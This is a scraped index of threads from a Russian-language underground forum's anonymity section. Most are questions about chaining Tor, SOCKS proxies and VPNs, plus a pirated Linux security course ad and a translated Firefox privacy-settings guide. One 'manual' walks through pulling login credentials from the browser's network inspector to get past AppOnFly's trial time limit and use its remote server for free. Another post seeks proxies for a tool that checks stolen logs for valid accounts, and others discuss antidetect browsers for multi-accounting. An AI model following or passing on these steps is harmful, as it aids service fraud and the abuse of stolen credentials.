Сабж. Очень подбешивает. Есть варианты обхода кроме как поверх тора натягивать соксы?

[OTUS] Безопасность Linux (2019)

ID: 676533bbb4103b69df371c4d
Thread ID: 47447
Created: 2021-01-31T15:07:51+0000
Last Post: 2021-01-31T15:07:51+0000
Author: DikTor
Prefix: Мануал/Книга
Replies: 0 Views: 1K

Автор: OTUS
Название: Безопасность Linux (2019)

Что даст вам этот курс:

Курс позволит вам получить практические знания по безопасному конфигурированию ОС Linux, использованию специализированных программных инструментов аудита защищенности, обеспечения сетевой защиты, обнаружения вторжений, поведенческого анализа и обнаружения инцидентов ИБ, а также выявления уязвимостей и критически слабых мест в ИТ-инфраструктуре. Вы самостоятельно сможете устранить все найденные проблемы и недостатки, не прибегая к дорогим коммерческим средствам или услугам сторонних компаний.

Кому адресован курс:

Системные администраторы и DevOps-инженеры, желающие углубить свою экспертизу в вопросах обеспечения безопасности ИТ-инфраструктуры, построенной на базе ОС Linux

Специалисты по информационной безопасности, сетевые инженеры, технические специалисты, отвечающие за настройку конфигураций ОС Linux и построенного на нем рабочего окружения (web-сервера, e-mail сервера, шлюзы доступа, LDAP-каталоги)

ИТ/ИБ-аудиторы, занимающиеся вопросами технического обследования и тестирования безопасности ОС Linux и рабочего окружения, построенного на его основе

Специалисты по тестированию на проникновение (пентестеры), желающие досконально изучить вопросы функционирования защитных механизмов в ОС Linux

Цель курса:

Подготовить слушателя, обеспечить его навыками и практическими знаниями для выполнения задач, связанных с безопасным конфигурированием ОС Linux и сопутствующих инфраструктурных сервисов, аудита уровня защищенности и реализации методов предотвращения хакерских атак на корпоративную ИТ- инфраструктуру.

Чему научитесь :

Применять лучшие мировые практики и стандарты ИБ (Debian, RedHat, MitRE) в целях настройки безопасности ОС Linux, при этом все настройки производятся без закупки и использования дорогостоящих коммерческих средств безопасности

Узнаете 90% всех причин, приводящих к взломам системы, основным рискам и типовым схемам атаки, и самое главное, о том, как этими рисками управлять и обеспечивать безопасность среды еще до момента развертывания систем в кластере или отдельных серверах

Использовать средства для обнаружения уязвимостей (CVE) в ОС Linux, установленных в вашем корпоративном кластере или работающих в облаке

Проводить эксплуатацию найденных уязвимостей (CVE), а также использовать средства и методы для защиты от этих атак

Устанавливать и конфигурировать сетевые системы обнаружения вторжений (IPS\IDS), защищать web-сайт от DDoS-атак, предотвращать перехват сетевого трафика и попытки несанкционированного сканирования сети

Устанавливать и конфигурировать системы мониторинга состояния защищенности и обнаружения инцидентов на базе open sources ПО

Проводить самостоятельный аудит безопасности системы по 50 ключевым показателям защищенности с помощью автоматизированных средств и ручных операций

Конфигурировать безопасную run time среду контейнеров на базе Docker

> Продажник

> Скачать

Как пустить трафик через SOCKS прокси после TOR для обхода детекта тора?

ID: 676533bbb4103b69df371c50
Thread ID: 47338
Created: 2021-01-28T18:56:14+0000
Last Post: 2021-01-29T15:24:09+0000
Author: user258
Replies: 8 Views: 1K

Здравствуйте!
Использую тор браузер, для различных целей. Некоторые сайты детектят тор и запрещают вход.
Насколько я понимаю, делают они это сверяя IP выходного узла тора.
Если это так, значит можно было бы это обойти используя SOCKS прокси, может какой нибудь из паблика.
Только вот как это сделать не прибегая к использованию виртуальных машин для такой, вроде бы простой задачи?
Возможно ли это сделать как то средствами самого тор браузера, что бы не приходилось постоянно запускаль какое нибудь стороннее ПО для работы такой цепи?
Заранее спасибо!

Разница в локациях гео-позиции при VPN

ID: 676533bbb4103b69df371c54
Thread ID: 46986
Created: 2021-01-19T14:04:17+0000
Last Post: 2021-01-20T11:10:17+0000
Author: mashkov
Replies: 7 Views: 1K

почему при использовании впн, разные сервисы показывают разные страны, от чего зависит, как сделать чтобы гарантировано все показывали оригинальную страну

Какие мобильные телефоны существуют для анонимности

ID: 676533bbb4103b69df371c5f
Thread ID: 46495
Created: 2021-01-08T19:46:30+0000
Last Post: 2021-01-09T08:34:36+0000
Author: tipokipocod
Replies: 7 Views: 1K

Вопрос св.

Запретить любые соеденения кроме VPN + раздать интернет через альфу?

ID: 676533bbb4103b69df371c63
Thread ID: 45914
Created: 2020-12-23T12:48:33+0000
Last Post: 2020-12-29T20:38:51+0000
Author: ruscat
Replies: 9 Views: 1K

Задача:
Есть ноут с Win7. На нем стоит DoubleVPN. OpenVPN конфиг.
Нужно запретить прямо жестко все соединения без ВПНа, но при этом с ноута, через USB + адаптер Alfa раздавать интернет на другие устройства.
Настройку брандмауера делал, но проблем в том, что правила слетели после экстренного выключения и восстановления Windows.
Итоговая задача, чтобы не было протечек на телефоне при подключении по WiFi.

Как пустить трафик через whonix на второй машине

ID: 676533bbb4103b69df371c65
Thread ID: 46012
Created: 2020-12-25T15:54:03+0000
Last Post: 2020-12-25T18:48:05+0000
Author: anwreystolad
Replies: 8 Views: 1K

Возможно ли подключится к Whonix Gateway по LAN с другой машины и пустить через нее трафик.

PC-1 VPN --->LAN ---> PC-2 на борту Whonix Gateway + VPN --->Cleranet.
Задача что бы PC один не знал что он подключен к ТОР

P.S. Чукча не художник.
P.S Видел в сети реализацию на малинке, но за неимением оной, использовать старенький комп.

Как создать цепочку прокси, VPN, тор, не прибегая к использованию виртуальных машин?

ID: 676533bbb4103b69df371c6c
Thread ID: 45473
Created: 2020-12-12T20:06:57+0000
Last Post: 2020-12-14T11:21:49+0000
Author: user259
Replies: 6 Views: 1K

Здравствуйте!
Возможно ли создать цепочку из прокси, VPN, тора (порядок не важен), не прибегая к использованию виртуальных машин?
В раличных туториалах в интернете практически всегда используют для этого виртуальные машины, это потому что "так безопаснее" или потому что без них сделать нереально?
Есть ли какой нибудь софт (для линукса, в моем случае), который сможет сделать это?
Заранее спасибо!

Как заблокировать утечку трафика при разрыве соединения с VPN

ID: 676533bbb4103b69df371c6e
Thread ID: 45084
Created: 2020-12-02T15:30:39+0000
Last Post: 2020-12-08T20:06:47+0000
Author: lukas
Replies: 4 Views: 1K

Как заблокировать утечку трафика на Windows 10 при разрыве соединения с VPN?
vpn - openvpn
блокировку через виндовозный фаервол не предлагать )))

Бесплатно отправляем СМС на любой номер

ID: 676533bbb4103b69df371c70
Thread ID: 44730
Created: 2020-11-24T12:04:02+0000
Last Post: 2020-12-06T14:40:23+0000
Author: Tubu
Replies: 2 Views: 1K

1. Перейти на данный сайтhttps://freebulksmsonline.com/
2. Вводим номер, на который будет отправлено наше СМС.
3. Печатаем текст сообщения.
4. Ждём на кнопку "SEND" и наше сообщение отправляется в путь.

Ещё один сервис отправки бесплатных смс.
переходим по ссылке и пользуемся http://mfreesms.com/
Регистрация не требуется.

На мегафоне есть беслатные смс внутри мегафона)
megafon.ru/help/info/message/

Обходим ограничения сервиса AppOnFly Cloud и получаем бесплатный дедик!

ID: 676533bbb4103b69df371c71
Thread ID: 45170
Created: 2020-12-04T12:34:58+0000
Last Post: 2020-12-04T18:40:14+0000
Author: Tubu
Prefix: Мануал/Книга
Replies: 3 Views: 1K

Переходим на сайт https://www.apponfly.com (не реклама). Спускаемся и нажимаем "Start Free Trial".

Нас перекидывает на другой сайт с удаленным сервером. Как видите, максимум мы можем пользоваться 30 минут, раньше было 60 минут

Данную ссылку с сервером перезагружаем, чтобы появилось окно входа.

Нажимаем правой кнопкой мыши в свободное место и нажимаем инспектировать (либо на клавиатуре нажмите Ctrl + Shift + I), и открываем вкладку Network.

Входим

Ждем полной загрузки винды. В Filter вписываем "sso".

https://imgur.com/W5WbDn3

открываем найденный объект

https://imgur.com/MoYOvWT

Прокручиваем вниз, где видим наш логин и пароль.

Наш сервер с консолью не закрываем. Открываем новую вкладку и переходим на сайт https://htmlgw2.apponfly.com:4443/AccessNow/start.html. Копируем из консоли логин и пароль, после нажимаем "Сonnect".

Мы получили доступ к дедику

Новое обновление Linken Sphere 27.11.20

ID: 676533bbb4103b69df371c74
Thread ID: 44897
Created: 2020-11-28T08:52:06+0000
Last Post: 2020-12-02T06:08:03+0000
Author: RuddyB
Replies: 6 Views: 1K

Доброго времени суток. Вчера вышло обновление сферы. Уже успел кто-нибудь поработать на новом браузере? Хочу перейти на него с другого антидетекта.
Также слышал, что это обновление якобы долгожданное. И разрабы год или больше не обновляли его.
Отзовитесь пожалуйста. Очень хочу услышать отзывы по работе с ним. Или посоветуйте норм браузер для работы с мультиаккаунтингом.

Также, кто хочет поделиться опытом или поработать вместе-пишите, у меня есть что предложить. Пока что работаю в соло.
Для связи: RuddyB

Nox+vpn+proxyfaer

ID: 676533bbb4103b69df371c7a
Thread ID: 44394
Created: 2020-11-16T14:20:58+0000
Last Post: 2020-11-16T23:20:49+0000
Author: sanyasnus
Replies: 10 Views: 1K

Доброго времени суток господа! Возникла проблема с Nox, при попытке работать с впн и сооксами не работает клавиатура. Все происходит через ноутбук+wifi.
1. Запускаю нокс;
2. Вкл впн(пробовал разный);
3. Proxyfaer;
После чего клавиатура работает 1 секунду.
В чем может быть проблема?
Настройки proxyrules

Статьи о безопасности

ID: 676533bbb4103b69df371c7c
Thread ID: 44263
Created: 2020-11-13T01:27:39+0000
Last Post: 2020-11-13T19:35:58+0000
Author: iphone1865Ok
Replies: 2 Views: 1K

Посоветуйте хорошие статьи или что вообще почитать, чтоб хорошо обезопасить свою конфиденциальность на просторах интернета.
Всем спасибо!

Откуда берутся сервера ТОР

ID: 676533bbb4103b69df371c83
Thread ID: 43865
Created: 2020-11-03T14:11:37+0000
Last Post: 2020-11-05T22:35:42+0000
Author: Mask
Replies: 9 Views: 1K

Даже не знаю нубский или не очень вопрос, но все же рискну спросить. Кто является владельцами серверов которые используются в цепочках тора?
Почему у некоторых людей такое доверие к тору? А вдруг все сервера тора это сервера условных спец. служб.
Спасибо!

Hacklog Volume 1 Anonymity

ID: 676533bbb4103b69df371c84
Thread ID: 43798
Created: 2020-11-01T16:57:24+0000
Last Post: 2020-11-03T15:15:42+0000
Author: fghz111
Prefix: Мануал/Книга
Replies: 4 Views: 1K

Нашел занимательную книжечку по анонимности. Поглядел в оглавление, думаю подавляющее большинство вопросов новичков там освящается. Книга на английском.

Spoiler: URL

[ Hacklog Volume 1 Anonymity: IT Security & Ethical Hacking Handbook

Download (230 Pages) ](https://www.pdfdrive.com/hacklog-volume-1-anonymity-it- security-ethical-hacking-handbook-e187904865.html)

Have you ever wished to become a hacker? If the answer is yes, this book is for you!Started as a crowdfunding project, Hacklog Volume 1: Anonymity is the first of a book collection dedicated to who wants to enter the world of Hacking and IT Security. You’ll learn how to use the tools real-life hac

www.pdfdrive.com

Firefox для пентестера: настройки конфиденциальности и защиты

ID: 676533bbb4103b69df371c85
Thread ID: 43859
Created: 2020-11-03T11:24:58+0000
Last Post: 2020-11-03T11:39:28+0000
Author: yashechka
Prefix: Статья
Replies: 4 Views: 1K

Это вторая статья из серии "Firefox для пентестеров". Ранее мы говорили о том, как мы можем улучшить конфиденциальность и защиту в Firefox с помощью различных надстроек, и поэтому в этой статье мы научимся защищать себя в Интернете с помощью параметров конфигурации, которые предоставляет нам Firefox. По сравнению с другими браузерами Firefox больше всего защищает наши данные и информацию. И все мы знаем, что Mozilla Firefox, вероятно, лучший браузер на сегодняшний день. Он обеспечивает функции конфиденциальности, активную разработку, потрясающую безопасность, а главное - частые обновления. Но мы все еще можем сделать его более безопасным, изменив несколько параметров.

Настройки конфигурации

Играя с конфигурациями в Firefox, следует изучить множество элементов. Каждая опция должна быть понят достаточно хорошо, чтобы можно было внести изменения, поскольку они повлияют на ваш способ просмотра веб-страниц. Чтобы внести изменения в конфигурации Firefox, введите "about:config" в адресной строке, как показано на изображении ниже:

После загрузки страницы about:config отобразится предупреждение. В предупреждении будет указано, что с этого момента, если вы что-либо измените, это приведет к аннулированию вашей гарантии и любые изменения, которые вы сделаете, будут на ваш страх и риск. Чтобы двигаться дальше, щелкните левой кнопкой мыши на "I accept the risk!" как показано на изображении выше. После того, как вы нажмете на кнопку, вы попадете на страницу, показанную на изображении ниже. Вот все варианты, касающиеся конфиденциальности и защиты в Интернете.

Изоляция собственных доменов

С помощью первого варианта мы изменим "privacy.firstparty.isolate". Эта встроенная характеристика позволяет вам получать доступ только к собственным доменам. Это означает, что все сторонние домены, которые маркируют собственные домены, теперь заблокированы и не могут отслеживать вашу активность в Интернете или собирать ваши данные. Все это возможно, поскольку он изолирует собственные домены от других и хранит ваши данные отдельно, так что перекрестное отслеживание становится невозможным. Следовательно, сторонние файлы cookie, скрытые файлы cookie, совместное использование данных и другие параметры будут отключены.

Эту опцию можно найти в строке поиска. По умолчанию для этого параметра установлено значение false, то есть по умолчанию он отключен, так как нарушает систему аутентификации многих веб-сайтов. Но если вы, как и мы, выступаете за конфиденциальность и анти-отслеживание, вам следует дважды щелкнуть левой кнопкой мыши по этой опции, чтобы изменить ее значение на true. Установка значения с false на true будет означать, что вы теперь включили эту опцию. Как только опция будет включена, статус опции будет изменен со значения по умолчанию на измененный, как показано на изображении ниже:

privacy.firstpart.isolate

Click to expand...

Предотвращение фингерпринтинга в браузере

Следующая опция — "privacy.resistFingerprinting". Чтобы понять, что делает этот параметр, давайте сначала разберемся, что такое отпечатки браузера. Клиентские сценарии, которые позволяют веб-сайту загружаться в браузере, позволяют снимать отпечатки браузера. Благодаря этому они собирают информацию о браузере, операционной системе, заголовке управления кешем, всевозможных заголовках, списке шрифтов, плагинах, которые используются, микрофоне, камере и так далее. Следовательно, их называют cookie-less монстрами. Этот процесс начинается в момент установления соединения с веб-сайтом. И эти функции используются путем взлома учетных данных, взлома данных и так далее. Все это можно остановить, включив параметр "privacy.resistFingerprinting" в вашем браузере.

Эту опцию можно найти в строке поиска. По умолчанию для этого параметра установлено значение false, то есть по умолчанию он отключен, так как нарушает систему аутентификации многих веб-сайтов. Но если вы, как и мы, выступаете за конфиденциальность и анти-отслеживание, вам следует дважды щелкнуть левой кнопкой мыши по этой опции, чтобы изменить ее значение на true. Установка значения с false на true будет означать, что вы теперь включили эту опцию. Как только опция будет включена, статус опции будет изменен со значения по умолчанию на измененный, как показано на изображении ниже:

privacy.resistFingerprinting

Click to expand...

Включение защиты от отслеживания

Следующая опция, о которой мы собираемся поговорить, - это privacy.trackingprotection.fingerprinting.enabled. Работает так же, как и предыдущая. Она тоже защищает вас от отпечатков браузера. Помимо предотвращения отслеживания веб-сайтов, она также предотвращает фишинговые атаки.

Эту опцию можно найти в строке поиска. По умолчанию для этого параметра установлено значение false, то есть по умолчанию она отключена, так как нарушает систему аутентификации многих веб-сайтов. Но если вы, как и мы, выступаете за конфиденциальность и анти-отслеживание, вам следует дважды щелкнуть левой кнопкой мыши по этой опции, чтобы изменить ее значение на true. Установка значения с false на true будет означать, что вы теперь включили эту опцию. После включения параметра состояние параметра будет изменено со значения по умолчанию на измененное, как показано на изображении ниже:

privacy.trackingprotection.fingerprinting.enabled

Click to expand...

Включение защиты от отслеживания (крипто-майнинг)

Проблема с крипто-майнерами заключается в том, что для их вычислений требуются огромные ресурсы, такие как процессор, мощность и оперативная память. Эти ресурсы дороги, и не все могут себе это позволить. Итак, что делают хакеры, так это то, что они контролируют системы разных людей и осуществляют крипто- майнинг из этой системы. Итак, чтобы ваш браузер не стал жертвой майнинга криптовалют, вам нужно всего лишь включить опцию privacy.trackingprotection.cryptomining.enabled.

privacy.trackingprotection.cryptomining.enabled

Click to expand...

Включение защиты от отслеживания

Наша следующая опция то есть privacy.trackingprotection.enabled позволяет нам полностью отказаться от отслеживания, которое осуществляется через браузер. Отслеживание - это запись ваших интернет-поисков, посещаемых вами веб-сайтов, данных, которыми вы делитесь и так далее и этот параметр сводит его на нет, блокируя все виды отслеживания. Он работает в списке фильтров disconnect.me.

privacy.trackingprotection.enabled

Click to expand...

Блокировка отслеживания Ping

Чтобы понять следующую опцию - browser.send_pings, давайте сначала разберемся с аудитом гиперссылок. Это метод отслеживания, при котором код HTML заставляет ваш браузер пинговать указанный URL. Этот URL-адрес проверяется при посещении веб-сайта, который вы собираетесь посетить. Этот метод отслеживания отличается от других, поскольку не дает пользователям никакого выбора. Он просто работает в фоновом режиме без ведома пользователя. Итак, чтобы отключить этот метод отслеживания, вам нужно войти в конфигурацию Firefox и отключить параметр browser.send_ping. Этот параметр гарантирует, что браузер блокирует все виды аудита гиперссылок.

browser.send_pings

Click to expand...

Отключение предварительной загрузки URL

Параметр browser.urlbar.speculativeConnect.enabled помогает нам контролировать предварительную загрузку URL. Каждый раз, когда вы вводите URL-адрес, на полпути вы, должно быть, заметили автозаполнение URL-адреса. Это известно как предварительная загрузка URL. Это работает так: когда вы начинаете с ввода URL-адреса, он отправляет запросы домена, чтобы продолжить работу с автозаполнением. Итак, отключив его, предварительная загрузка URL-адресов в адресную строку прекратится. Это помогает предотвратить предложения, которые вам не нужны или которые могут быть сочтены небезопасными.

browser.urlbar.speculativeConnect.enabled

Click to expand...

Сохранение конфиденциальности буфера обмена

Всякий раз, когда вы копируете, вырезаете или вставляете что-либо с веб-сайта или на него; он получает подробные уведомления, так что они будут знать, какую часть веб-страницы вы скопировали. Это делается путем отслеживания вашего буфера обмена. С помощью опции dom.event.clipboardevents.enabled мы можем убедиться, что веб-сайты не отслеживают наши данные из буфера обмена.

dom.event.clipboardevents.enabled

Click to expand...

Отключение EME Media

Всякий раз, когда вы копируете, вырезаете или вставляете что-либо с веб-сайта или на него; он получает подробные уведомления, так что они будут знать, какую часть веб-страницы вы скопировали. Это делается путем отслеживания вашего буфера обмена. С помощью опции dom.event.clipboardevents.enabled мы можем убедиться, что веб-сайты не отслеживают наши данные из буфера обмена.

Для этого параметра media.eme.enabled по умолчанию установлено значение false. Это означает, что ни один зашифрованный медиа файл не будет загружен без разрешения пользователя. Его можно искать через строку поиска. Если случайно эта опция включена, обязательно отключите ее как можно скорее. И если он отключен по умолчанию, статус этой конфигурации останется по умолчанию, как показано на изображении ниже:

media.eme.enabled

Click to expand...

Ограничение контента DRM

Контенту, который вы просматриваете в Интернете, нельзя доверять. Обычно, когда на веб-сайте запущено программное обеспечение, основанное на DRM, оно может иметь управление на уровне файлов и даже на уровне пользователя. Элемент управления на уровне пользователя позволяет им получать доступ, делиться, загружать или распечатывать все, что они пожелают. Следовательно, вы всегда должны контролировать ситуацию. Даже если ваш браузер требует включить DRM- контент, вы не должны поддаваться на это. Firefox предоставляет нам возможность, - media.gmp-widevinecdm.enabled, позволяющую ограничивать контент DRM.

media.gmp-widevinecdm.enabled

Click to expand...

Отключение навигации по мультимедиа

Эта опция, если она включена, позволит вашему браузеру извлекать информацию из вашей системы и представлять ее посещаемым вами веб-сайтам. Данные, собранные из системы, также могут быть отправлены на сторонние домены. Дело в том, что если вы разрешите эту опцию, она будет собирать информацию об операционной системе, разрешении экрана, типе системы, FrameRate, FaceMode мобильных устройств, возможном доступе к пользовательским медиа и так далее. И что еще хуже, они могут контролировать разрешения для вкладок аудио/видео в браузере, а также получать доступ к камере или микрофону. Следовательно, мы все можем прийти к соглашению, что сохранение этой опции является серьезной угрозой. А чтобы спасти нас от потенциальных угроз, нам просто нужно отключить опцию media.gmp-widevinecdm.enabled.

media.navigator.enabled

Click to expand...

Ограничение поведения файлов cookie

При посещении веб-сайта создаются различные файлы cookie. Эти файлы cookie могут быть необходимы для функций веб-сайта. И другие - неважные файлы cookie, такие как сторонние файлы cookie. Эти файлы cookie часто являются результатом рекламы, виджетов и веб-аналитики. Они отслеживают вашу информацию для входа, корзины покупок, язык, который вы используете, и так далее. По умолчанию для network.cookie.cookiebehaviour установлено значение 0. Это значение можно установить между числами от 0 до 4, где:

0 = принять все значения cookie
1 = принимать только от собственных доменов
2 = по умолчанию блокировать все файлы cookie
3 = использовать настройки p3p
4 = политика доступа к хранилищу: блокировать файлы cookie от трекеров

Мы выберем здесь значение 1, поскольку нам нужны файлы cookie только из собственных доменов.

network.cookie.cookieBehavior

Click to expand...

Эту опцию можно найти в строке поиска. После изменения значения параметра статус параметра будет изменен со значения по умолчанию на измененный, как показано на изображении ниже:

Заголовок Control Referrer

При просмотре Интернета на запрашиваемый веб-сайт отправляется заголовок реферера. Этот заголовок содержит информацию о странице, на которой вы ранее были, и откуда вы запросили следующую веб-страницу. Обычно Firefox не отправляет заголовок реферера с HTTPS на HTTP. Отправка такой информации через заголовок реферера создает проблемы с безопасностью, поскольку они могут раскрыть вашу личную информацию и личные данные. Проще говоря, просто используя эту опцию, вы сможете контролировать, хотите ли вы, чтобы реферер отправлялся через перекрестные источники или нет. Теперь эти данные можно отправлять в разные домены происхождения, то есть через origins. Но встроенная в Firefox защита от отслеживания позволяет решить эту проблему с помощью параметра network.http.referer.XoriginPolicy.

Это значение можно установить между числами от 0 до 2, где:

0 = отправить реферера во всех случаях
1 = отправлять реферер, только если базовые домены совпадают
2 = отправлять реферер только из того же источника

Значение по умолчанию для этой опции равно 0, то есть отправлять реферера во всех случаях, и мы изменим его значение на 2, то есть отправим реферера только в тот же источник.

network.http.referer.XOriginPolicy

Click to expand...

Эту опцию можно найти в строке поиска. После изменения значения параметра статус параметра будет изменен со значения по умолчанию на измененный, как показано на изображении ниже:

Ограничение заголовка Referer

С помощью предыдущего параметра конфигурации мы узнали, что можем контролировать, хотим ли мы отправлять заголовки рефереров через источники или нет. Теперь будет много ситуаций, когда вам нужно будет отправить эти заголовки реферера через origin или даже в тот же origin. Здесь вы можете ограничить заголовок, управляя элементами заголовка. Опция network.http.referer.XOriginTrimmingPolicy позволяет нам это сделать. Это значение можно установить между числами от 0 до 2, где:

0 = отправить полный URL
1 = отправить URL без строки запроса
2 = отправить только источник

Значение по умолчанию для этой опции - 0, то есть отправить полный URL-адрес, и мы изменим его значение на 2, т.е. отправим только источник.

network.http.referer.XOriginTrimmingPolicy

Click to expand...

Эту опцию можно найти в строке поиска. После изменения значения параметра статус параметра будет изменен со значения по умолчанию на измененный, как показано на изображении ниже:

Ограничение WebGL

WebGL - это опция, предоставляемая Firefox, которая превращает каждую веб- страницу в трехмерную графику. Увы! Он имеет различные недостатки безопасности. Это позволяет злоумышленникам атаковать ваши графические драйверы вместе с графическим процессором, чтобы сделать всю вашу систему бесполезной. Хотите ли вы использовать такую опцию или нет, Firefox оставил на усмотрение пользователя, когда он представил конфигурационный параметр webgl.disable. С помощью этой опции вы можете отключить WebGL.

webgl.disabled

Click to expand...

Отключение восстановления сеанса

Бывают случаи, когда пользователь сталкивается с некоторыми сбоями или отключениями электроэнергии, которые вызывают отключение системы. Если у пользователя есть какие-то URL-адреса, открытые в браузере или вошедшие в какое-либо приложение, они восстанавливаются, когда пользователь перезагружает систему. Начиная с выпуска Firefox 2.0 эта опция включена по умолчанию. Некоторые пользователи считают, что это хорошая функция, которая помогает им восстанавливать данные или сеансы, но это представляет угрозу безопасности, поскольку исходный предполагаемый пользователь не перезапускает систему или если это происходит в общедоступной системе, а не человек, который обращается к системе после перезапуска получает потенциальный доступ к тем вошедшим в систему сеансам и веб-сайтам, которые просматривал исходный пользователь. Эта опция содержит 3 возможных значения.

0 = хранить дополнительные данные сеанса для любого сайта
1 = хранить данные дополнительного сеанса только для незашифрованных (не HTTPS) сайтов
2 = никогда не хранить дополнительные данные сеанса

Значение по умолчанию для этой опции равно 0, то есть сохранять данные сеанса для любого сайта, и мы изменим его значение на 2, то есть никогда не сохранять какие-либо данные.

browser.sessionstore.privacy_level

Click to expand...

Эту опцию можно найти в строке поиска. После изменения значения параметра статус параметра будет изменен со значения по умолчанию на измененный, как показано на изображении ниже:

Отключение маячка

IEEE 802.12.4 говорит, что режим с включенным маяком должен применяться через сеть. Он отправляет информацию о личной сети на серверы, чтобы сообщить им о своем присутствии. Это позволяет время от времени подключаться к новым устройствам. Полезно поддерживать синхронизацию сети. Но это не обязательно, так как он отправляет подробную информацию о сети, в которой вы находитесь.

beacon.enabled

Click to expand...

Защита удаленных загрузок

По умолчанию в Firefox включены безопасные удаленные загрузки. И мы часто говорили о случаях, когда загружаемый файл кажется подлинным, но вместо этого может быть вредоносным. И никогда нельзя быть слишком уверенным. Используя browser.safebrowsing.downloads.remote.enabled, мы можем быть на шаг ближе к тому, чтобы узнать, что мы загружаем безопасные файлы.

browser.safebrowsing.downloads.remote.enabled

Click to expand...

Предварительная загрузка Firefox

Как видно из названия, предварительная выборка в Firefox выполняется для быстрой загрузки веб-страниц для пользователя. Браузер всегда может заранее вызвать параметры, которые, как ему известно, будут использоваться веб- сайтами. Эти параметры содержат данные об используемых ресурсах. Следовательно, в любой момент они могут быть запрошены, и браузер предварительно загрузит необходимую информацию для пользователя. Браузер предсказывает доменные имена, которые вы, скорее всего, посетите, что ускорит процесс разрешения доменных имен. Этот вариант был разработан для экономии времени пользователя, но оказался проблемой безопасности. Firefox может предварительно загружать такие вещи, как DNS, сеть, IP-адрес и так далее.

Эта предварительная выборка может выполняться через DNS (все, что связано с DNS) или HTTPS (содержимое HTTPS). И было доказано, что это проблема безопасности, поэтому предварительную выборку DNS и HTTP можно отключить с помощью следующих параметров:

network.dns.disablePrefetch
network.dns.disablePrefetchFromHTTPS

По умолчанию оба параметра имеют значение false. Чтобы отключить эти параметры, измените их на true, и предварительная выборка DNS и HTTPS не будет. Как только эти параметры отключены, статус этих параметров будет изменен на заблокированный, как показано на изображении ниже:

Еще один предварительный выбор, который вы можете отключить, - это предсказатель сети. Эта опция позволяет предварительно получить все данные, относящиеся к сети, к которой вы подключены. Его можно отключить, установив для него значение false. По умолчанию это значение установлено как true. После изменения значения параметра на false; его статус меняется на измененный, как показано на изображении ниже:

network.predictor.enabled

Click to expand...

Другой вариант отключить, чтобы запретить браузеру предварительно получать сведения о сети, - это network.predictor.enable-prefetch. Эта опция позволяет предварительно выбрать все сетевые данные, как следует из названия. Её можно отключить, установив для него значение false.

network.predictor.enable-prefetch

Click to expand...

Параметр network.prefetch-next позволяет предварительно выбирать определенные ссылки. Это делается, когда веб-сайт сообщает браузеру о вероятности посещения определенных страниц. Поэтому браузер загружает их заранее для удобства пользователей. Его можно отключить, установив для него значение false. По умолчанию это значение установлено как true. После изменения значения параметра на false; его статус меняется на измененный, как показано на изображении ниже:

network.prefetch-next

Click to expand...

Отключение преобразования IDN Punycode

Прежде чем разобраться в этом конкретном варианте, сначала необходимо понять значение поддержки IDN. IDN позволяет веб-сайту регистрировать доменные имена, используя символы, происходящие из их местного или родного языка. Чтобы расширить поддержку этих символов, была разработана новая кодировка под названием "Punycode". По умолчанию значение network.IDN_show_punycode имеет значение false. Это означает, что IDN включен. Но какой бы хорошей ни была функция, ею можно злоупотреблять. Это было продемонстрировано, когда в 2005 году резко возросло количество спуфинговых и фишинговых атак с использованием IDN. Это можно пояснить на следующем примере:

Оригинальный домен: https://hackingarticles.in
Фишинговый домен: https://hackingarticlés.in

Обратите внимание на é в фишинговом домене. Когда этот параметр включен, он преобразует é в e, так что пользователи, которые не используют é на своем языке, могут видеть его как простое e. Но это преобразование также лишает пользователя возможности визуально отличить подлинный домен от фишингового.

По умолчанию это значение установлено как false. Как только значение параметра изменится на true; его статус меняется на измененный, как показано на изображении ниже:

network.IDN_show_punycode

Click to expand...

Заключение

Включая и отключая параметры конфигурации, предоставляемые Firefox, вы можете обеспечить конфиденциальность и защиту в Интернете без использования подключаемых модулей. Это безопасная процедура, так как сторонний домен не может вас отслеживать.
Если у вас возникли проблемы с каким-либо конкретным веб-приложением, аутентификацией с включенными/отключенными этими параметрами, вам следует создать контейнер в Firefox, используя временный контейнерный плагин или профилирование, предоставляемое Firefox. Поэтому вы теперь в безопасности, и отслеживание разных источников не выполняется в вашем браузере. Следовательно, ваши данные и личная информация в безопасности.

Источник <https://www.hackingarticles.in/firefox-for-pentester-privacy-and- protection-configurations/>
Автор перевода: yashechka
Переведено специально для https://xss.is

Посоветуйте проверенный proxy-сервис?

ID: 676533bbb4103b69df371c89
Thread ID: 43701
Created: 2020-10-29T17:36:35+0000
Last Post: 2020-10-30T11:37:56+0000
Author: PundiX
Replies: 14 Views: 1K

Нужны прокси для работы с UniversalLogTools, который чекает логи на валид различных аккаунтов.
В связи с этим, ищу сервис с большим кол-вом proxy, но за адекватные деньги.
Кто подскажет на личном примере, чем пользуется?

Изолированный браузер ?

ID: 676533bbb4103b69df371c8a
Thread ID: 43607
Created: 2020-10-27T20:30:52+0000
Last Post: 2020-10-29T17:10:07+0000
Author: Evilxxx
Replies: 7 Views: 1K

Нужно решение по примеру антидетекта , сферы и тд.
Задача что бы на ПК было два браузера FF и они не оставляли никаких следов - куки , логи и тд. Приватное окно не предлагать.

Точное время

ID: 676533bbb4103b69df371c8d
Thread ID: 43335
Created: 2020-10-20T04:41:15+0000
Last Post: 2020-10-20T04:41:15+0000
Author: Benihowy
Prefix: Статья
Replies: 0 Views: 1K

В нашей жизни все зависит от времени. На нем завязано абсолютно все, в том числе компьютеры, и сети. Фильтруя трафик файерволами, не придаем значения точного времени, и блокируем svchost.exe на порт 123. Да, избавились от ненужного трафика, который не влияет на работоспособность системы. В итоге мы получили машину, которая будет имеет не точное время. Речь идет о минутах и может доходить до часа за год. Как повседневное средство анонимизации, является установка браузера на виртуальную машину и проброс трафика браузера через тор\впн\ссш и тд. И вроде бы все хорошо, делаем снапшот после работы и стираем все следы. Но забываем одну вещь - это время. Любой браузер берет системное время операционной системы, а время виртуальной машины берётся от хоста. То есть, если на хосте часы отстают на 10 минут и 29 секунд и 10 миллисекунд, то на виртуальной машине будет такое же отставание. Если взять системы отслеживания гугла или яндекса, то с большое долей вероятности будет сопоставление истории посещения с данным пользователем. Да, самого пользователя идентифицировать на этой фазе не удастся, но будет история его серфинга в интернете. Поиск будет производится по разнице между UTC и пользовательским временем. Поэтому нужно избегать не состыковки такого рода путем обращения на сервера NTP.
При использовании нескольких виртуальных машин разумнее будет создать сервер NTP и уже с ним сверять время. Сервер в свою очередь поставить на автоматическую сверку с интернетом.
